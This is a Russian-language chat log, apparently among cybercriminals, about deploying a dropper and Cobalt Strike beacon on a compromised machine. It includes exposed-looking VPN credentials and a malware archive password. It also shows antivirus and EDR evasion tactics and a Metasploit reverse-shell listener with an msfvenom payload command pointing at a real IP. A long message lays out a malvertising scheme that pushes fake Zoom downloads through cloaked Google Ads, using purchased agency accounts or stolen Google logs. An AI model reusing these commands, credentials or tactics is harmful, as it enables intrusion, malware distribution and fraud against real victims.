[2023-11-18 19:33:04] @usernamegg:matrix.bestflowers247.online: жду
--------------------
[2023-11-18 19:36:50] @usernamegg:matrix.bestflowers247.online: WithCountryCheckedAccessJuniperVulnerable.txt
--------------------
[2023-11-18 19:38:21] @usernamegg:matrix.bestflowers247.online: `Canada                	https://158.85.67.156:8443	jkey	vM476KU_y3Q'	ssh 158.85.67.156 jkey vM476KU_y3Q'`

--------------------
[2023-11-18 19:38:58] @usernamegg:matrix.bestflowers247.online: Снимок экрана 2023-11-18 в 22.38.49.png
--------------------
[2023-11-18 19:38:59] @usernamegg:matrix.bestflowers247.online: ага
--------------------
[2023-11-18 19:39:02] @usernamegg:matrix.bestflowers247.online: вот прочитай
--------------------
[2023-11-18 19:39:10] @usernamegg:matrix.bestflowers247.online: подумай
--------------------
[2023-11-18 19:39:13] @usernamegg:matrix.bestflowers247.online: как сделать лучше
--------------------
[2023-11-18 19:39:28] @usernamegg:matrix.bestflowers247.online: ладно не на 4е месяца )
--------------------
[2023-11-18 19:39:31] @usernamegg:matrix.bestflowers247.online: как было ранее )
--------------------
[2023-11-18 19:39:42] @w:matrixtcFJHPDblmt2rg.network: тут
--------------------
[2023-11-18 19:39:44] @w:matrixtcFJHPDblmt2rg.network: сек
--------------------
[2023-11-18 19:39:47] @w:matrixtcFJHPDblmt2rg.network: инет отпадал
--------------------
[2023-11-18 19:39:47] @usernamegg:matrix.bestflowers247.online: эндпоин протект это пиздец
--------------------
[2023-11-18 19:39:56] @w:matrixtcFJHPDblmt2rg.network: у меня софос же обходит
--------------------
[2023-11-18 19:40:07] @usernamegg:matrix.bestflowers247.online: > <@w:matrixtcFJHPDblmt2rg.network> что на 4 месяца?

пропал ты тогда
--------------------
[2023-11-18 19:40:13] @w:matrixtcFJHPDblmt2rg.network: я же полностью софос обхожу
--------------------
[2023-11-18 19:40:18] @w:matrixtcFJHPDblmt2rg.network: софа не проблема для меня вроде
--------------------
[2023-11-18 19:40:42] @w:matrixtcFJHPDblmt2rg.network: что на 4 месяца?
--------------------
[2023-11-18 19:40:50] @w:matrixtcFJHPDblmt2rg.network: щас асек, прочитаю
--------------------
[2023-11-18 19:40:53] @w:matrixtcFJHPDblmt2rg.network: ничего понять не могу))))
--------------------
[2023-11-18 19:41:15] @w:matrixtcFJHPDblmt2rg.network: ааа
--------------------
[2023-11-18 19:41:17] @w:matrixtcFJHPDblmt2rg.network: щас сек
--------------------
[2023-11-18 19:41:25] @usernamegg:matrix.bestflowers247.online: да
--------------------
[2023-11-18 19:41:28] @usernamegg:matrix.bestflowers247.online: деф уже удалил
--------------------
[2023-11-18 19:41:46] @w:matrixtcFJHPDblmt2rg.network: щас длку проверю на чистоту
--------------------
[2023-11-18 19:41:48] @w:matrixtcFJHPDblmt2rg.network: пару сек
--------------------
[2023-11-18 19:42:07] @w:matrixtcFJHPDblmt2rg.network: только софа там?
--------------------
[2023-11-18 19:42:59] @usernamegg:matrix.bestflowers247.online: ну можешь мне дать фаил я скажу )
--------------------
[2023-11-18 19:43:16] @w:matrixtcFJHPDblmt2rg.network: ага, олтлично
--------------------
[2023-11-18 19:43:17] @w:matrixtcFJHPDblmt2rg.network: сек
--------------------
[2023-11-18 19:43:28] @usernamegg:matrix.bestflowers247.online: а дроппер от моего лоадера запускал ?
--------------------
[2023-11-18 19:43:29] @w:matrixtcFJHPDblmt2rg.network: щас проверяю как софа на меня реагирует
--------------------
[2023-11-18 19:43:31] @w:matrixtcFJHPDblmt2rg.network: сек
--------------------
[2023-11-18 19:43:37] @usernamegg:matrix.bestflowers247.online: dropper_GG10FR_f0adda360d2b4ccda11468e026526576_MJW0E7sBJ.zip
--------------------
[2023-11-18 19:43:41] @burito:matrix.bestflowers247.online: а ну глянь
--------------------
[2023-11-18 19:43:42] @usernamegg:matrix.bestflowers247.online: PASS: d9ef790a14d3c015e1797adc5047de79
вот давай
--------------------
[2023-11-18 19:43:56] @burito:matrix.bestflowers247.online: дроппер тоже гасит
--------------------
[2023-11-18 19:44:05] @burito:matrix.bestflowers247.online: щас глянь нет ниче?
--------------------
[2023-11-18 19:44:05] @usernamegg:matrix.bestflowers247.online: нету в кобе
--------------------
[2023-11-18 19:44:09] @w:matrixtcFJHPDblmt2rg.network: dropper_GG10FR_f0adda360d2b4ccda11468e026526576_MJW0E7sBJ.zip
--------------------
[2023-11-18 19:44:15] @w:matrixtcFJHPDblmt2rg.network: PASS: d9ef790a14d3c015e1797adc5047de79
--------------------
[2023-11-18 19:44:16] @w:matrixtcFJHPDblmt2rg.network: вот давай
--------------------
[2023-11-18 19:44:20] @burito:matrix.bestflowers247.online: но стартануло
--------------------
[2023-11-18 19:44:21] @usernamegg:matrix.bestflowers247.online: обе посмотрел
--------------------
[2023-11-18 19:44:25] @usernamegg:matrix.bestflowers247.online: ты куда звал ?
--------------------
[2023-11-18 19:44:27] @usernamegg:matrix.bestflowers247.online: в днс ?
--------------------
[2023-11-18 19:44:29] @burito:matrix.bestflowers247.online: щас еще раз
--------------------
[2023-11-18 19:44:33] @burito:matrix.bestflowers247.online: днс
--------------------
[2023-11-18 19:44:35] @usernamegg:matrix.bestflowers247.online: если в днс то надо ждать
--------------------
[2023-11-18 19:44:49] @burito:matrix.bestflowers247.online: а, ну давай подождем
--------------------
[2023-11-18 19:44:58] @w:matrixtcFJHPDblmt2rg.network: помнишь тот закреп мы покупали?
--------------------
[2023-11-18 19:45:02] @w:matrixtcFJHPDblmt2rg.network: ты можешь его сделать щас туда?
--------------------
[2023-11-18 19:45:04] @usernamegg:matrix.bestflowers247.online: процесс есть ?
--------------------
[2023-11-18 19:45:07] @w:matrixtcFJHPDblmt2rg.network: и загрузить туда shellcode injection
--------------------
[2023-11-18 19:45:13] @burito:matrix.bestflowers247.online: ска но стартануло ))
--------------------
[2023-11-18 19:45:14] @w:matrixtcFJHPDblmt2rg.network: если мой не сработает
--------------------
[2023-11-18 19:45:14] @usernamegg:matrix.bestflowers247.online: не удалило ?
--------------------
[2023-11-18 19:45:16] @burito:matrix.bestflowers247.online: висит
--------------------
[2023-11-18 19:45:24] @w:matrixtcFJHPDblmt2rg.network: только .dll разрешение сделай же
--------------------
[2023-11-18 19:45:43] @burito:matrix.bestflowers247.online: через бля дебагер, в который я скопипастил тупо нагрузку. это пиздец изврат
--------------------
[2023-11-18 19:46:07] @usernamegg:matrix.bestflowers247.online: > <@w:matrixtcFJHPDblmt2rg.network> на scanner.to чистый софос

там хом
--------------------
[2023-11-18 19:46:11] @usernamegg:matrix.bestflowers247.online: он слабый
--------------------
[2023-11-18 19:46:27] @w:matrixtcFJHPDblmt2rg.network: на scanner.to чистый софос
--------------------
[2023-11-18 19:46:29] @usernamegg:matrix.bestflowers247.online: ага
--------------------
[2023-11-18 19:46:32] @usernamegg:matrix.bestflowers247.online: но зато висит
--------------------
[2023-11-18 19:46:59] @usernamegg:matrix.bestflowers247.online: dns_4
--------------------
[2023-11-18 19:47:00] @w:matrixtcFJHPDblmt2rg.network: https://scanner.to/result/fBJ76df6Q8
--------------------
[2023-11-18 19:47:02] @usernamegg:matrix.bestflowers247.online: ведь ты запустил ?
--------------------
[2023-11-18 19:47:03] @w:matrixtcFJHPDblmt2rg.network: вот
--------------------
[2023-11-18 19:47:05] @w:matrixtcFJHPDblmt2rg.network: ну этот файл в пятницу слали
--------------------
[2023-11-18 19:47:06] @w:matrixtcFJHPDblmt2rg.network: он щас загрязнился, но под софос нормально должно быть
--------------------
[2023-11-18 19:47:07] @w:matrixtcFJHPDblmt2rg.network: хотя если там ебучая едрка может статику сьесть
--------------------
[2023-11-18 19:47:08] @w:matrixtcFJHPDblmt2rg.network: ааа
--------------------
[2023-11-18 19:47:19] @w:matrixtcFJHPDblmt2rg.network: проверишь, сразу отпиши
--------------------
[2023-11-18 19:47:25] @burito:matrix.bestflowers247.online: payload_x86_dns4.bin
--------------------
[2023-11-18 19:47:26] @burito:matrix.bestflowers247.online: да
--------------------
[2023-11-18 19:47:37] @usernamegg:matrix.bestflowers247.online: запусти дроппер который я скинул
--------------------
[2023-11-18 19:47:38] @usernamegg:matrix.bestflowers247.online: еще
--------------------
[2023-11-18 19:47:48] @w:matrixtcFJHPDblmt2rg.network: делаю новый бюилд чистый
--------------------
[2023-11-18 19:47:48] @burito:matrix.bestflowers247.online: щас
--------------------
[2023-11-18 19:47:55] @w:matrixtcFJHPDblmt2rg.network: должен быть чистый
--------------------
[2023-11-18 19:48:46] @burito:matrix.bestflowers247.online: не, он удалит. его тоже только через ольку
--------------------
[2023-11-18 19:48:53] @burito:matrix.bestflowers247.online: давай эту дождемся
--------------------
[2023-11-18 19:49:16] @usernamegg:matrix.bestflowers247.online: ждем
--------------------
[2023-11-18 19:49:26] @usernamegg:matrix.bestflowers247.online: нету
--------------------
[2023-11-18 19:49:27] @usernamegg:matrix.bestflowers247.online: жду
--------------------
[2023-11-18 19:49:38] @burito:matrix.bestflowers247.online: короче он ебашит все варианты, только через дебагер и то - в него копипаст кода работает
--------------------
[2023-11-18 19:49:41] @usernamegg:matrix.bestflowers247.online: значит там днс долгий
--------------------
[2023-11-18 19:49:42] @usernamegg:matrix.bestflowers247.online: ждем
--------------------
[2023-11-18 19:49:50] @burito:matrix.bestflowers247.online: ага))
--------------------
[2023-11-18 19:49:57] @usernamegg:matrix.bestflowers247.online: до 20 минут
--------------------
[2023-11-18 19:49:59] @burito:matrix.bestflowers247.online: самому интересно
--------------------
[2023-11-18 19:50:01] @usernamegg:matrix.bestflowers247.online: до 30 даже
--------------------
[2023-11-18 19:50:07] @burito:matrix.bestflowers247.online: ок
--------------------
[2023-11-18 19:52:09] @w:matrixtcFJHPDblmt2rg.network: запустил билд, сразу на сканер закину проверю
--------------------
[2023-11-18 19:52:15] @w:matrixtcFJHPDblmt2rg.network: отпишешь как старый билд запустишь
--------------------
[2023-11-18 19:52:20] @usernamegg:matrix.bestflowers247.online: бурито там уже по РДП СИДИТ))))
--------------------
[2023-11-18 19:52:31] @usernamegg:matrix.bestflowers247.online: софос через дебагер пытаеться мне позвать в кобу
--------------------
[2023-11-18 19:52:36] @w:matrixtcFJHPDblmt2rg.network: бурито сможет снять чисто статику, если статика палиться
--------------------
[2023-11-18 19:54:02] @w:matrixtcFJHPDblmt2rg.network: > <@usernamegg:matrix.bestflowers247.online> бурито там уже по РДП СИДИТ))))

ахаххахаахахаха
--------------------
[2023-11-18 19:54:04] @w:matrixtcFJHPDblmt2rg.network: )))))
--------------------
[2023-11-18 19:54:14] @w:matrixtcFJHPDblmt2rg.network: сильно)))
--------------------
[2023-11-18 19:56:08] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2023-11-18 19:56:11] @usernamegg:matrix.bestflowers247.online: пришел
--------------------
[2023-11-18 19:56:15] @usernamegg:matrix.bestflowers247.online: хариджонсон
--------------------
[2023-11-18 19:56:18] @usernamegg:matrix.bestflowers247.online: инжект делаю
--------------------
[2023-11-18 19:56:22] @burito:matrix.bestflowers247.online: ебаный свет
--------------------
[2023-11-18 19:56:25] @usernamegg:matrix.bestflowers247.online: ПРИШЕЛ НАХУЙ)
--------------------
[2023-11-18 19:56:26] @burito:matrix.bestflowers247.online: )))))))
--------------------
[2023-11-18 19:56:33] @burito:matrix.bestflowers247.online: пиздец
--------------------
[2023-11-18 19:56:49] @burito:matrix.bestflowers247.online: ору
--------------------
[2023-11-18 19:57:30] @usernamegg:matrix.bestflowers247.online: дааа
--------------------
[2023-11-18 19:57:34] @usernamegg:matrix.bestflowers247.online: инжект поставил
--------------------
[2023-11-18 19:57:35] @usernamegg:matrix.bestflowers247.online: жду
--------------------
[2023-11-18 19:57:46] @burito:matrix.bestflowers247.online: жесть ска
--------------------
[2023-11-18 19:58:12] @usernamegg:matrix.bestflowers247.online: хром ты закрыл ?
--------------------
[2023-11-18 19:58:15] @usernamegg:matrix.bestflowers247.online: процессов не вижу а то
--------------------
[2023-11-18 19:58:21] @usernamegg:matrix.bestflowers247.online: хари джонсон какой то
--------------------
[2023-11-18 19:58:25] @usernamegg:matrix.bestflowers247.online: там тачку не так зову
--------------------
[2023-11-18 19:58:30] @usernamegg:matrix.bestflowers247.online: но софос есть
--------------------
[2023-11-18 19:58:33] @burito:matrix.bestflowers247.online: закрыт
--------------------
[2023-11-18 19:58:37] @usernamegg:matrix.bestflowers247.online: может он подмену делает
--------------------
[2023-11-18 20:05:14] @w:matrixtcFJHPDblmt2rg.network: https://scanner.to/result/MGGLDqq796
--------------------
[2023-11-18 20:05:28] @w:matrixtcFJHPDblmt2rg.network: чисто должно быть
--------------------
[2023-11-18 20:05:45] @w:matrixtcFJHPDblmt2rg.network: палит только деф и нортон, комодо и квик хил
--------------------
[2023-11-18 20:05:53] @w:matrixtcFJHPDblmt2rg.network: кароче все самые черти собрались в кучку
--------------------
[2023-11-18 20:05:57] @w:matrixtcFJHPDblmt2rg.network: щас билд скину новый
--------------------
[2023-11-18 20:07:10] @w:matrixtcFJHPDblmt2rg.network: EngVers.dll
--------------------
[2023-11-18 20:07:13] @w:matrixtcFJHPDblmt2rg.network: вот билд
--------------------
[2023-11-18 20:07:24] @w:matrixtcFJHPDblmt2rg.network: там 5 IP стоит нормальных на инфре, на этом билде именно
--------------------
[2023-11-18 20:07:32] @w:matrixtcFJHPDblmt2rg.network: под точку тебе считай с головой
--------------------
[2023-11-18 20:07:38] @usernamegg:matrix.bestflowers247.online: запуск какой ?Ю
--------------------
[2023-11-18 20:07:41] @usernamegg:matrix.bestflowers247.online: EngVers.dll
--------------------
[2023-11-18 20:07:51] @usernamegg:matrix.bestflowers247.online: https://scanner.to/result/MGGLDqq796
чисто должно быть
палит только деф и нортон, комодо и квик хил
кароче все самые черти собрались в кучку
щас билд скину новый
EngVers.dll (791.5 KB)
вот билд
там 5 IP стоит нормальных на инфре, на этом билде именно
под точку тебе считай с головой
да, кароче все самые черти в кучке и палят, комодо в итоге все равно запустился, нортон палит хер пойми что, квик хил палит инжект моего бота
а вот деф палит таблицу импорта
--------------------
[2023-11-18 20:08:02] @usernamegg:matrix.bestflowers247.online: запусти плз rundll32 file.dll, Throw

--------------------
[2023-11-18 20:08:05] @w:matrixtcFJHPDblmt2rg.network: да, кароче все самые черти в кучке и палят, комодо в итоге все равно запустился, нортон палит хер пойми что, квик хил палит инжект моего бота
--------------------
[2023-11-18 20:08:10] @w:matrixtcFJHPDblmt2rg.network: а вот деф палит таблицу импорта
--------------------
[2023-11-18 20:08:10] @burito:matrix.bestflowers247.online: щас
--------------------
[2023-11-18 20:08:24] @w:matrixtcFJHPDblmt2rg.network: кароче все детекты предсказуемые
--------------------
[2023-11-18 20:08:26] @usernamegg:matrix.bestflowers247.online: щас
--------------------
[2023-11-18 20:08:29] @w:matrixtcFJHPDblmt2rg.network: софа должна пустить нас
--------------------
[2023-11-18 20:08:34] @w:matrixtcFJHPDblmt2rg.network: Throw
--------------------
[2023-11-18 20:08:40] @w:matrixtcFJHPDblmt2rg.network: rundll32 file.dll, Throw
--------------------
[2023-11-18 20:08:42] @w:matrixtcFJHPDblmt2rg.network: вот аткой
--------------------
[2023-11-18 20:09:22] @w:matrixtcFJHPDblmt2rg.network: +++
--------------------
[2023-11-18 20:10:23] @w:matrixtcFJHPDblmt2rg.network: если что могу еще левый серт туда подкинуть
--------------------
[2023-11-18 20:10:29] @w:matrixtcFJHPDblmt2rg.network: ну на файл
--------------------
[2023-11-18 20:10:31] @w:matrixtcFJHPDblmt2rg.network: может поможет
--------------------
[2023-11-18 20:10:37] @w:matrixtcFJHPDblmt2rg.network: но он не валид будет, но все равно
--------------------
[2023-11-18 20:10:40] @w:matrixtcFJHPDblmt2rg.network: раньше помогало
--------------------
[2023-11-18 20:11:34] @burito:matrix.bestflowers247.online: щас криптану
--------------------
[2023-11-18 20:12:30] @burito:matrix.bestflowers247.online: так блин ее ж софос все равно не даст запустить
--------------------
[2023-11-18 20:12:46] @burito:matrix.bestflowers247.online: я ж грю ехе и длл все сносит
--------------------
[2023-11-18 20:14:16] @usernamejj:matrix.bestflowers247.online: ```
Listener
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp_rc4
set LHOST 194.135.24.241
set LPORT 443
set RC4PASSWORD Passw0rd!
set EXITFUNC thread
set ExitOnSession false
run -j
```
--------------------
[2023-11-18 20:16:01] @usernamejj:matrix.bestflowers247.online: ```
создание .bin пейлоуда
msfvenom -p windows/meterpreter/reverse_tcp_rc4 -a x86 --platform windows RC4PASSWORD=Passw0rd! lhost=127.0.0.1 lport=443 EXITFUNC=thread -i 30 -f raw DEMSF443.bin
```
--------------------
[2023-11-18 20:34:56] @usernamegg:matrix.bestflowers247.online: сдох
--------------------
[2023-11-18 20:34:59] @usernamegg:matrix.bestflowers247.online: надо еще раз звать
--------------------
[2023-11-18 20:35:08] @usernamegg:matrix.bestflowers247.online: в кобе это
--------------------
[2023-11-18 20:35:11] @usernamegg:matrix.bestflowers247.online: на днс
--------------------
[2023-11-18 20:35:23] @burito:matrix.bestflowers247.online: да, у меня процесс завершился
--------------------
[2023-11-18 20:35:32] @usernamegg:matrix.bestflowers247.online: > <@burito:matrix.bestflowers247.online> да, у меня процесс завершился

вот (
--------------------
[2023-11-18 20:35:35] @usernamegg:matrix.bestflowers247.online: надо снова позвать
--------------------
[2023-11-18 20:35:47] @burito:matrix.bestflowers247.online: так ты ниче не сделал?
--------------------
[2023-11-18 20:35:54] @usernamegg:matrix.bestflowers247.online: нет
--------------------
[2023-11-18 20:35:55] @usernamegg:matrix.bestflowers247.online: не успел
--------------------
[2023-11-18 20:36:03] @burito:matrix.bestflowers247.online: щас
--------------------
[2023-11-18 20:36:06] @usernamegg:matrix.bestflowers247.online: надо снвоа звать
--------------------
[2023-11-18 20:36:17] @burito:matrix.bestflowers247.online: но это не софос уже, просто сам процесс офф
--------------------
[2023-11-18 20:36:28] @usernamegg:matrix.bestflowers247.online: понял
--------------------
[2023-11-18 20:36:29] @burito:matrix.bestflowers247.online: 5мин
--------------------
[2023-11-18 20:36:31] @usernamegg:matrix.bestflowers247.online: позови еще раз
--------------------
[2023-11-18 20:38:25] @w:matrixtcFJHPDblmt2rg.network: ну как там?
--------------------
[2023-11-18 20:38:40] @w:matrixtcFJHPDblmt2rg.network: получилось с моим?
--------------------
[2023-11-18 20:38:46] @burito:matrix.bestflowers247.online: запустил
--------------------
[2023-11-18 20:38:51] @burito:matrix.bestflowers247.online: не дышу
--------------------
[2023-11-18 20:38:58] @burito:matrix.bestflowers247.online: :D
--------------------
[2023-11-18 20:50:02] @burito:matrix.bestflowers247.online: завершился
--------------------
[2023-11-18 20:59:23] @burito:matrix.bestflowers247.online: ну что там? я заново запустил
--------------------
[2023-11-18 21:13:23] @usernamegg:matrix.bestflowers247.online: не пришло
--------------------
[2023-11-18 21:13:56] @usernamegg:matrix.bestflowers247.online: не пришел
--------------------
[2023-11-18 21:16:49] @usernamegg:matrix.bestflowers247.online: нет
--------------------
[2023-11-18 21:16:52] @usernamegg:matrix.bestflowers247.online: сразу хавает софос
--------------------
[2023-11-18 21:16:55] @w:matrixtcFJHPDblmt2rg.network: но запустилось без предупреждений?
--------------------
[2023-11-18 21:17:17] @w:matrixtcFJHPDblmt2rg.network: не было палева?
--------------------
[2023-11-18 21:17:48] @usernamegg:matrix.bestflowers247.online: paessler.com.txt
--------------------
[2023-11-18 21:17:48] @usernamegg:matrix.bestflowers247.online: superops.ai_cleaned.txt
--------------------
[2023-11-18 21:19:10] @usernamegg:matrix.bestflowers247.online: есть еще мысли ?
--------------------
[2023-11-18 21:19:15] @burito:matrix.bestflowers247.online: смотрю лог софоса, пишет, что он наебнул процесс таки
--------------------
[2023-11-18 21:19:26] @usernamegg:matrix.bestflowers247.online: ааа
--------------------
[2023-11-18 21:19:29] @burito:matrix.bestflowers247.online: так первый раз же норм было?
--------------------
[2023-11-18 21:19:35] @w:matrixtcFJHPDblmt2rg.network: понял
--------------------
[2023-11-18 21:19:38] @w:matrixtcFJHPDblmt2rg.network: херня, а какой детект
--------------------
[2023-11-18 21:19:41] @usernamegg:matrix.bestflowers247.online: не знаю
--------------------
[2023-11-18 21:19:47] @w:matrixtcFJHPDblmt2rg.network: ML PE?
--------------------
[2023-11-18 21:19:48] @usernamegg:matrix.bestflowers247.online: я не на рдп
--------------------
[2023-11-18 21:19:50] @usernamegg:matrix.bestflowers247.online: юурито там
--------------------
[2023-11-18 21:19:55] @usernamegg:matrix.bestflowers247.online: да
--------------------
[2023-11-18 21:19:59] @usernamegg:matrix.bestflowers247.online: но он от инжекта умер
--------------------
[2023-11-18 21:20:02] @burito:matrix.bestflowers247.online: но не сразу же хоть наебнул
--------------------
[2023-11-18 21:20:13] @burito:matrix.bestflowers247.online: вот видать инжект и спалился
--------------------
[2023-11-18 21:30:03] @usernamegg:matrix.bestflowers247.online: вообще оставляю тебе rdp до утра
--------------------
[2023-11-18 21:30:10] @usernamegg:matrix.bestflowers247.online: придумай как мне его позвать
--------------------
[2023-11-18 21:30:18] @usernamegg:matrix.bestflowers247.online: утром приду хочу поработать с этим ботом
--------------------
[2023-11-18 21:33:41] @burito:matrix.bestflowers247.online: ну с шеллом вряд ли. он инжект палит
--------------------
[2023-11-18 21:33:43] @w:matrixtcFJHPDblmt2rg.network: # Термины:

1. Вайт - сайт, который полностью легальный и не нарушает правила рекламы в той или иной платформе, где мы будем размещать рекламу
2. Блек - наш сайт, который уже будет делать, то что нам нужно ( выдавать файл ) - у нас блек - лендинг
3. Клоака - система, которая будет фильтровать ботов, модераторов и разную нечесть, котоаря как либо хочет нам помешать ( у нас это ADSPECT )
4. Модератор - это работник чаще всего платформы, которую мы будем использовать для рекламы, иногда модераторов наинимают со стороны )
5. МониторингБот Плафтормы - их бот, который заходит и проверяет, ничего ли мы не поменяли на сайте и не хотим ли мы их обьебать
6. Конверт - кол-во целевых действий, к примеру у нас конверт - скачивание файла

# Подготовка для залива:

1. Создаем вайт, который никак не нарушет правила размещения ( в нашем случае поисковик )
2. Создаем блек, на который будет попоадать жертва после клика на рекламу ( в нашем случае зум )
3. Делаем/Ищем аккаунт(ы) на котор(ом/ых) будем запускать рекламу ( 1 Вариант: ищем людей, которые продают или предоставляют агенсткие аккаунты под процент или за фикс прайс. 2 Вариант: ищем людей, которые продают логи гугла на которых уже привзяана гугл карта, чтобы в дальнейшем с них снимались бабки. Данный способ имеет куча недостатков от Suspisous Payments, до невозмонжности поднять бюджет в космос. 3 Вариант: Создание своих аккаунтов, прогрев их и подвзяваные либо новорегов БА или же своих VCC.)

# Делаем залив:

1. Переходим в гугл адс кабинет и начинаем создавать обьявление и ключи
## Обьявление:

- Создание заголовков в рекламе
- Создание описния в рекламе
- Указание ссылки, на которую будет реклама идти

## Ключи:

WARNING: Есть ключи тригеры, которые часто используются фишерами - free, document, ...

- Делаем обычные ключи, по которым будем рекламится, очень важно, чтобы тематика вайта подходила под эти ключи и включала их по семантическому вхождению.

P.S. -> У нас будут ключи: zoom download, video chat install, video chat download, zoom install/er

2. После того как мы создали обьявления ( их будет несколько разных, некоторые с картинками или с доп инфой, смотреть скрины ), наша компания отправляется на модерку ( на агентских аккаунт реклама идет почти сразу, даже без модерки из-за сильного траста от акка ), плату за клик мы ставим как можно меньше, чтобы быстрее пройти модерку, после того как мы прошли модерку, мы выставляем сразу нормальные ставки за клик и выставляет лимит по бюджету - трата около 1к$ в сутки ( можно больше, все зависит от того сколько есть на аккаунте, так как гугл не даст поставить 1к, если у тебя на акке всего 1к, так как есть такое понятие как перекрут, бывает расходная часть превышает твой бюджет из-за медленной синхронизации, они пытаются это сбавить тем, что когда уже допустим 900 баксов отлилось, и осталось отлить - 100 бакосв, они понижают тебя в выдаче до 3-ей позиции в зависимости от цены за клик, но это не всегда помогает )
3. После того как мы запустились, мы начинаем смотреть конверт, тобишь сколько людей скачало файл и по какому ключу и какому обьявлению, те обьявления или ключи, с которых очень мало конверта лучше сразу отключить, за этим нужно следить каждый день и собирать стату, как и что ( В Adspect мы это все сможем видеть, я это все хорошо настрою )

# Почему я могу отливать нормальные суммы:

1. У гугла был суд, в котором он заплатил штраф в размере около 400кк баксов, за то что монополизировал рынок поисковиков и не давал им рекламироваться ( на данный момент они пропускают почти все поисковики, потому что если нет, их выебут снова. Штраф растет в геометрической прогрессии )
2. Из-за того, что это посиковик, мы сможем делать абсолютно любые ключи, даже те которые в блоке ( так как мы ведем их на другой поисковик, то есть мы априори не можем быть фишингом или мошениками, там сразу видно, что мы предоставляем легал инфу, которая будет основываться на трастовой выдаче других сайтов, в том числе гугла )
3. Из-за того, что у нас будет агентский аккаунт, нам не надо долбаться с лимитами, которые гугл ставит на обычные аккаунты, мы условно как элита среди аккаунтов
--------------------
[2023-11-18 21:33:51] @w:matrixtcFJHPDblmt2rg.network: Щас тебе еще скрины скину
--------------------
[2023-11-18 21:33:53] @w:matrixtcFJHPDblmt2rg.network: пару минут
--------------------
[2023-11-18 21:34:14] @burito:matrix.bestflowers247.online: а дроппер этот тоже пробовать?
--------------------
[2023-11-18 21:34:15] @w:matrixtcFJHPDblmt2rg.network: это все базовое, чтобы ты понимал что это вообще такое
--------------------
[2023-11-18 21:34:28] @w:matrixtcFJHPDblmt2rg.network: на какую авантюру мы так сказать подписываемся
--------------------
[2023-11-18 21:34:49] @w:matrixtcFJHPDblmt2rg.network: посторался максимально тезисно тебе все описать
--------------------
[2023-11-18 21:34:55] @w:matrixtcFJHPDblmt2rg.network: и в кратце, чтобы голову не засорять
--------------------
[2023-11-18 21:35:57] @usernamegg:matrix.bestflowers247.online: ты запускал ?
--------------------
[2023-11-18 21:36:07] @usernamegg:matrix.bestflowers247.online: ты криптани дроппер и запусти его
--------------------
[2023-11-18 21:36:16] @usernamegg:matrix.bestflowers247.online: может он ко мне в леадер приджет
--------------------
[2023-11-18 21:36:27] @burito:matrix.bestflowers247.online: я дллки пробовал, нифига
--------------------
[2023-11-18 21:36:42] @burito:matrix.bestflowers247.online: напомни какой именно дроппер
--------------------
[2023-11-18 21:36:50] @burito:matrix.bestflowers247.online: попробую его
--------------------
[2023-11-18 21:37:03] @usernamegg:matrix.bestflowers247.online: круто, сейчас уже не вникну но с утра все прочитаю и вникну
--------------------
[2023-11-18 21:37:20] @usernamegg:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> sent a file.

!
--------------------
[2023-11-18 21:37:31] @usernamegg:matrix.bestflowers247.online: rundll32 file.dll, Throw
--------------------
[2023-11-18 21:37:40] @burito:matrix.bestflowers247.online: ок
--------------------
[2023-11-18 21:38:07] @w:matrixtcFJHPDblmt2rg.network: lf? jrtq
--------------------
[2023-11-18 21:38:09] @w:matrixtcFJHPDblmt2rg.network: да, окей
--------------------
[2023-11-18 21:38:20] @w:matrixtcFJHPDblmt2rg.network: конечно, инфа новая
--------------------
[2023-11-18 21:38:39] @w:matrixtcFJHPDblmt2rg.network: залью скоро на сервки все, просто брендинг под каждый домен же еще)
--------------------
[2023-11-18 21:39:07] @w:matrixtcFJHPDblmt2rg.network: чтобы сложно было доказатоь, что все 5 поисковиков - это мы
--------------------
[2023-11-18 21:39:15] @w:matrixtcFJHPDblmt2rg.network: завтра msi сделаю, подпишем, все проверим
--------------------
[2023-11-18 21:39:25] @usernamegg:matrix.bestflowers247.online: хорошо, серт у тебя есть
--------------------
[2023-11-18 21:39:27] @w:matrixtcFJHPDblmt2rg.network: завтра бурито будет на связи, чисто чтобы крипт сделать
--------------------
[2023-11-18 21:39:29] @usernamegg:matrix.bestflowers247.online: завтра пустим уже траф ?
--------------------
[2023-11-18 21:39:37] @usernamegg:matrix.bestflowers247.online: чисто по юсе канаде давай
--------------------
[2023-11-18 21:39:42] @w:matrixtcFJHPDblmt2rg.network: а то в MSI пихать не криптованый особо смысла нет
--------------------
[2023-11-18 21:39:55] @usernamegg:matrix.bestflowers247.online: ой
--------------------
[2023-11-18 21:40:01] @usernamegg:matrix.bestflowers247.online: у меня уже в голове что завтра понедельник
--------------------
[2023-11-18 21:40:06] @usernamegg:matrix.bestflowers247.online: я то ведь работаю
--------------------
[2023-11-18 21:40:10] @usernamegg:matrix.bestflowers247.online: никуда не ухожу
--------------------
[2023-11-18 21:40:23] @usernamegg:matrix.bestflowers247.online: потестить
--------------------
[2023-11-18 21:40:30] @usernamegg:matrix.bestflowers247.online: что бы в пн уже по боевому запустить
--------------------
[2023-11-18 21:40:39] @w:matrixtcFJHPDblmt2rg.network: > <@usernamegg:matrix.bestflowers247.online> завтра пустим уже траф ?

не, в понедельник же
--------------------
[2023-11-18 21:40:45] @w:matrixtcFJHPDblmt2rg.network: завтра вряд ли
--------------------
[2023-11-18 21:40:51] @usernamegg:matrix.bestflowers247.online: у меня самочувствие не очень хорошее правда
--------------------
[2023-11-18 21:40:52] @w:matrixtcFJHPDblmt2rg.network: хотя
--------------------
[2023-11-18 21:40:57] @usernamegg:matrix.bestflowers247.online: ладно, прорвемся
--------------------
[2023-11-18 21:41:00] @w:matrixtcFJHPDblmt2rg.network: ну да, лучше с утра в понедельник
--------------------
[2023-11-18 21:41:02] @usernamegg:matrix.bestflowers247.online: выспаться надо
--------------------
[2023-11-18 21:41:07] @w:matrixtcFJHPDblmt2rg.network: > <@usernamegg:matrix.bestflowers247.online> чисто по юсе канаде давай

да
--------------------
[2023-11-18 21:41:11] @w:matrixtcFJHPDblmt2rg.network: > <@usernamegg:matrix.bestflowers247.online> никуда не ухожу

ну да)
--------------------
[2023-11-18 21:41:29] @usernamegg:matrix.bestflowers247.online: на мне два офиса )
--------------------
[2023-11-18 21:41:31] @w:matrixtcFJHPDblmt2rg.network: ага, тоже вот думаю
--------------------
[2023-11-18 21:41:33] @usernamegg:matrix.bestflowers247.online: они все без трафа сидят
--------------------
